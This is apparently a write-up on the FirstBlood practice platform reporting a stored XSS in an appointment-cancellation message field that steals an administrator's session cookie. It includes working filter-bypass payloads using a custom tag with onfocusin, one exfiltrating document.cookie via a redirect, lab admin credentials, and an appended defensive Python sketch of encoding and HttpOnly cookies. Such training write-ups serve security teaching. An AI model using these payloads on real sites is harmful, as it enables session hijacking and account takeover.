FirstBlood-#78[COLLAB] 1 Click XSS can lead to Admin Account Takeover
This issue was discovered on FirstBlood v1

On 2021-05-09, 0xblackbird Level 5 reported:

Hello Zseano! I hope you're doing well today! I found a stored cross-site scripting vulnerability that I could escalate to account takeover by stealing cookies. My payload currently requires minimal user-interaction, 1-click to be exact. If I still do find a better one, one without user interaction, I will make sure to update my report before triage.


My payload now requires nothing to fire. Here is my payload: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm%601%60">

Payload that goes away with cookie: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="window.location.href=''%2bdocument.cookie">

Thanks a lot! Found a similar bug in the wild; this again proves that FirstBlood is extremely realistic :D!

Steps to reproduce

  • Visit /book-appointment.html and fill in all the required fields and click on Book Appointment.
  • Next, copy the Appointment ID and visit /yourappointments.php.
  • Paste in the previous copied ID and Retrieve Appointment.
  • After that, scroll down and click on Cancel Appointment. Make sure you intercept this request.
  • Add the message with the following payload: "><xss/id="1"/tabindex="1"/onfocusin="window.location.href=''%2bdocument.cookie">
  • You will normally get a confirm box confirming that Your appointment has been cancelled, click on Ok.
  • Next, visit /login.php and login with the credentials provided: drAdmin:s2Wpx5zfUvlSZhspJ.
  • Navigate to /drpanel/cancelled.php, and click on the last cancelled appointment.
  • You'll see that we get redirected to with our cookie in the cookie parameter. This cookie can be easily reused even if the admin securely logged out. This is because the cookie does not expire.


I was able to take over an admin account by cancelling our appointment and including a message.


It took me some time to get to this payload. I first tried some basic HTML tags and quickly realised that most of the common ones are blocked. Because we are not allowed to use any automated tools, I went and just tried custom tags. This worked :D! I thought that maybe <xss/contenteditable/autofocus/onfocus=""> would work, but it didn't because of the onfocus event handler. This meant that we had to find one with user interaction. That's how I came across onfocusin; this event handler didn't get removed, and I was again one step closer to achieving stored cross-site scripting :D!! Quickly after that I got a working 1-click payload. And because cookies were not HttpOnly, I went for stealing cookies as this is the easiest way of achieving account takeover!

Thanks a lot for the fun challenge! Have a nice day!


Endpoint: /api/ma.php

Parameter: message

Payload: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm`1`">

FirstBlood ID: 12
Vulnerability Type: Auth issues

If the request method is changed from POST to GET, then the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error
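Added illustration of the two defensive points in this report (not code from the report or from FirstBlood): a hypothetical denylist filter of the kind described above, which strips common tags and onfocus but never matches onfocusin, is contrasted with contextual output encoding, and a cookie header shows the HttpOnly and Max-Age attributes whose absence made the cookie-theft escalation possible. The denylist rules, the attribute-context template and the cookie name are assumptions; the payload is the one quoted in the report.

```python
import html
import re
from html.parser import HTMLParser

# Message payload quoted in the report above, in its URL-decoded form.
REPORT_PAYLOAD = (
    '"><xss/id="1"/tabindex="1"/onfocusin="window.location.href=\'\'+document.cookie">'
)

# Hypothetical denylist in the spirit of the filter the report describes.
BLOCKED_TAGS = ("script", "img", "svg", "iframe", "body")
BLOCKED_HANDLERS = ("onfocus", "onload", "onerror", "onclick")

def denylist_sanitize(message: str) -> str:
    out = message
    for tag in BLOCKED_TAGS:
        out = re.sub(rf"</?{tag}\b", "", out, flags=re.IGNORECASE)
    for handler in BLOCKED_HANDLERS:
        # 'onfocus=' is removed, but 'onfocusin=' never matches this rule.
        out = re.sub(rf"\b{handler}\s*=", "", out, flags=re.IGNORECASE)
    return out

# Assumed template: message inside a quoted attribute, hence the leading '">'.
def render_denylist(message: str) -> str:
    return f'<input type="text" value="{denylist_sanitize(message)}">'

def render_encoded(message: str) -> str:
    # Contextual output encoding: <, >, ", ' and & become entities.
    return f'<input type="text" value="{html.escape(message, quote=True)}">'

class _HandlerFinder(HTMLParser):
    # Parses the fragment as a browser would and records every on* attribute.
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        self.found += [f"{tag}.{n}" for n, _ in attrs if n.startswith("on")]

def find_event_handlers(fragment: str) -> list:
    finder = _HandlerFinder()
    finder.feed(fragment)
    finder.close()
    return finder.found

def session_cookie_header(session_id: str) -> str:
    # HttpOnly hides the value from document.cookie and Max-Age expires it,
    # the two properties the report's escalation relied on. Name is assumed.
    return f"Set-Cookie: session={session_id}; Path=/; Max-Age=3600; HttpOnly; Secure; SameSite=Lax"
```

With the denylist the rendered page still carries an xss element with a live onfocusin attribute; with encoding the whole message stays inside the value attribute and no element or handler is created.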

Report Feedback


Creator & Administrator

Great report 0xblackbird and nice finding! I'm splitting the 1500 bounty between three of you, great team work!